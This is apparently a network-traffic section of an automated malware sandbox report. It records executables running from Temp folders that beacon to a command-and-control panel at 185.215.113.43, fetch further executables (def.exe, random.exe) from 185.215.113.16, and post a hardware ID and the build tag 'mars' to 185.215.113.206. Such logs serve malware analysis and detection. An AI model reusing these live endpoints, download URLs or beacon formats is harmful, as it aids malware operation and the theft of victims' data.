Nov 13, 2024 20:41:52.872087955 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:52.872127056 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:52.872160912 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:52.872195959 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:52.872230053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:52.872265100 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:52.872298956 CET	1236	IN	Data Raw: 1c f8 0f fb f4 55 11 c0 7d 44 0f 38 6e 7a 6c ea 19 91 76 da da 2f 63 9a a9 0a 45 b9 43 8f d5 cf d5 7c bb 5e 3f 6d 96 1a 26 c5 4c f0 4e 33 01 bb 8a 0b 31 ea c6 fe 03 b6 7c 2d 0e b4 8c 03 c8 cc 8e f6 20 fa f4 01 1d 12 d9 1a 30 b0 6a 14 0e 4b b7 dd Data Ascii: U}D8nzlv/cEC\|^?m&LN31\|- 0jK5F~[Eu )_M"jW3(s;=8/%Pn`tD&6HnKw+SzwP~}9n!j7w
Nov 13, 2024 20:41:52.872334003 CET	1236	IN	Data Raw: 09 f9 26 10 31 f9 2a dc 19 e4 af f0 73 1c 25 69 bb 24 21 f4 ec 2f 43 d9 aa 81 4b 00 91 3c 1b fb ba 24 5b da 1c 5c 5f fd 21 ef 9c 78 91 f9 66 fa ba 58 27 28 ed 40 77 ee de 95 81 34 b9 1c 83 d1 ea 1d bb 54 74 78 14 82 91 7c 33 fb fa 0d 9b 48 03 b4 Data Ascii: &1*s%i$!/CK<$[\_!xfX'(@w4Ttx\|3H:6:5xO`/rOSk\ O$S\X!;tn/xFq):.$jK'5+UyGxU\|<~Iot$$//;bwg./
Nov 13, 2024 20:41:52.872370005 CET	1236	IN	Data Raw: d2 16 20 01 e7 34 27 cd cd 61 d7 fa 85 e0 16 6f 80 ef 28 28 c1 09 4b a1 75 52 56 19 e0 d4 7c 9e d7 21 55 2b 7f 75 49 bf 0b 53 fc cd 9a 0e 5c 91 cb fc 7a 0a 71 5f 98 1c 8b ec 84 1c dc 4f 77 55 03 09 73 e9 8c 53 6b 03 82 c6 bb fb f8 a9 40 4c 3e e2 Data Ascii: 4'ao((KuRV\|!U+uIS\zq_OwUsSk@L>Zi79#N.N;_{LS/"o%&{#UqFt-N[ 2:#HJ!L<1<S)!2qGr}_U%& Y(#eHI
Nov 13, 2024 20:41:52.874252081 CET	1236	IN	Data Raw: 79 41 f0 a4 a3 10 06 d4 9e 94 0c bf 57 f0 48 db 6e 09 15 3b 6f 10 67 c8 6b 26 f3 20 72 01 f2 eb 6e 00 6d 06 bc 0d b9 8d ee d5 02 32 d0 bf 24 69 ba ba 7f ff d1 5e 2f b8 ba ee 18 0f d9 4d 73 06 69 5b 71 fd de 4f 68 a9 3b 19 12 8b 2b 63 76 3d db d4 Data Ascii: yAWHn;ogk& rnm2$i^/Msi[qOh;+cv=lilv}J<z<6d'i7o8.DV;$#<%16t"#s5/t=/%w@@;\uC$ #.=>:aNho5q's/S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50184	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:52.878968954 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:41:53.927336931 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50192	185.215.113.43	80	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:55.599963903 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:41:56.500829935 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50199	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:58.189374924 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:41:59.116127014 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50203	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:00.762496948 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:01.666438103 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50208	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:03.177145004 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:04.099020004 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50213	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:05.725263119 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50214	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:07.256474018 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:09.225218058 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 13, 2024 20:42:09.225846052 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 13, 2024 20:42:09.226628065 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 13, 2024 20:42:09.226999044 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50216	185.215.113.16	80	8040	C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:09.917972088 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50217	185.215.113.16	80	8040	C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:10.583509922 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 13, 2024 20:42:11.497725964 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:11 GMT Content-Type: application/octet-stream Content-Length: 1799168 Last-Modified: Wed, 13 Nov 2024 19:21:30 GMT Connection: keep-alive ETag: "6734fc3a-1b7400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 c0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 68 00 00 04 00 00 e7 f6 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"h@h@M$a$ $b@.rsrc $r@.idata $r@ *$t@dhewrjwpNv@uaqjjwiohL@.taggant0h"R@
Nov 13, 2024 20:42:11.497778893 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:42:11.497813940 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:42:11.497848988 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:42:11.497900963 CET	848	IN	Data Raw: 8a 66 b5 f5 3f 6b e8 76 77 17 3d 72 00 ee c7 8c 8a f5 3e 1a bc 50 81 d8 9f ef 63 19 d8 66 d1 a0 af 46 02 79 f9 4b 0c 18 39 e5 e3 e3 88 f2 29 01 58 7c 21 89 9f f3 85 c0 96 c6 3f 1d e9 f6 15 c8 17 19 9e b9 0f 3d 79 1e 42 63 24 1a 1e fc 31 22 34 be Data Ascii: f?kvw=r>PcfFyK9)X\|!?=yBc$1"4>$2myT$+)(~.s^9Nq~#!jMKvi()[2QA{Co-);Bw~!l.G+oof
Nov 13, 2024 20:42:11.497934103 CET	1236	IN	Data Raw: ef b6 1d 1e 33 94 72 f9 cd 73 e1 57 9c ae 84 fc 06 f2 b1 57 5b f5 7a f2 b3 23 5f 02 90 a2 e6 23 19 c0 ba fc 63 f5 cd 39 92 66 8a 79 90 c0 22 b4 6e eb d5 2d cd 01 69 77 a5 a5 23 07 91 87 fe b9 8c 01 6e 36 96 ca 74 ae 69 7f de f5 bb c7 fb df 5f 9b Data Ascii: 3rsWW[z#_#c9fy"n-iw#n6ti_X9{?z9w`;"(/H@6G+m2}ubAAQ5#Mqu?kjpxIKm@9pKE8_[4^Q{+'0h0.eaY[De"n
Nov 13, 2024 20:42:11.497967958 CET	1236	IN	Data Raw: 19 4f c6 38 aa 86 be c3 79 aa 9a 99 93 82 89 9b 2b aa b3 fb c3 a6 31 1d 15 f3 f6 a7 d6 aa 97 24 69 f9 77 5c 73 d0 c6 39 c2 6f c0 99 99 0f fc 39 ad ff c9 27 f4 a2 32 d1 dd 2a ed b2 ba 00 b2 03 db a0 00 ae 79 81 ba 41 85 22 1b 96 79 81 50 1a 6c 0a Data Ascii: O8y+1$iw\s9o9'2yA"yPl!;m+z1z>t#O)8OGGpE-'2"919C'Ch?y#`\f}iXiF"dZ* t9`E)dV^q
Nov 13, 2024 20:42:11.498001099 CET	1236	IN	Data Raw: 54 c7 e3 68 77 b1 f6 5d db ba 70 e2 5e c7 fb 26 48 b4 e9 d9 9f ea 77 79 e8 f0 fb b8 05 70 0d f1 cb 9f e6 7c 89 38 d6 46 b7 1f e4 99 9f 2a 69 e5 1b 87 ea 23 b4 1f e4 7d 9f 06 95 f8 c5 b0 8d 13 0f 86 fc 81 d9 a6 74 05 d0 e0 72 52 86 42 f1 bd f6 ca Data Ascii: Thw]p^&Hwyp\|8Fi#}trRB ]ZI$P06}"wX,:)B{-xq6{G&UsK"8ttZ!yew!1v}s`u^q
Nov 13, 2024 20:42:11.498034000 CET	1236	IN	Data Raw: df bb 99 ea 8d 26 0e 08 fc 2a d0 92 e4 86 04 dc df b4 fe d5 d0 a7 29 f4 6f a0 db 94 a3 07 06 e8 d9 e9 ff 68 f4 b6 c8 f3 77 af ee e8 83 d3 fa d7 f8 08 d2 f0 87 ce 71 ce db 9a 3c e0 b2 d6 e3 f9 db 02 a6 a2 e1 84 cd e5 c7 a0 22 fa 13 08 72 1a a5 3c Data Ascii: &)ohwq<"r<RyB+[[qygg+i:LN:7CA\|y~}%Iz.W!Fyj#@
Nov 13, 2024 20:42:11.498068094 CET	1236	IN	Data Raw: 9f 2a 38 ec 1c 67 8c 99 6f 9c e1 c8 87 32 72 05 03 c7 5c ed 9e 80 fc cd 86 ad f1 9b 9f 65 c4 e1 8d 86 46 a0 20 97 8c f2 52 2e d0 f8 47 a8 5d da 8a 66 ae 25 f2 9f 1b 7a 07 99 ed 0d dc 7e 2b 25 66 9f c5 f7 99 b4 c6 7c 7b 55 22 d8 dd 8e 0d f1 2f 9f Data Ascii: 8go2r\eF R.G]f%z~+%f\|{U"/~V!-=1yrf2rV_$wj#c%/8q&#;6!k":'x>oqIyTL8Z
Nov 13, 2024 20:42:11.503030062 CET	1236	IN	Data Raw: cf ed d3 b8 f7 96 3f a1 b2 26 7a 42 a7 6a 77 4d 6f ea 1c 23 5c a1 89 6e 19 7d fa a5 5e 84 2e 06 97 76 17 f6 c7 66 03 1a ec a8 28 0a d5 86 8f 4d 7c 2b cf 18 83 aa 25 6e 39 4e dd 41 95 91 86 05 85 3d f1 56 57 c2 ca d2 e9 ef 23 d2 8c f0 9c f1 b5 04 Data Ascii: ?&zBjwMo#\n}^.vf(M\|+%n9NA=VW#Fwe_B!UO[*(:QznRt=fNvnx-~z3L42{!3x_4b}O=n"_1H/3vnxpr&51

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50218	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:11.094146013 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:12.013603926 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50219	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:13.749238968 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:42:14.675801992 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50221	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:16.319236040 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:42:17.222862959 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50222	185.215.113.206	80	8040	C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:42:17.324615002 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 13, 2024 20:42:18.229736090 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:42:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:42:18.233755112 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 33 45 42 46 43 35 33 37 32 36 33 30 35 30 34 35 37 33 35 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="hwid"E83EBFC537263050457358------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="build"mars------BKKKEGIDBGHIDGDHDBFH--
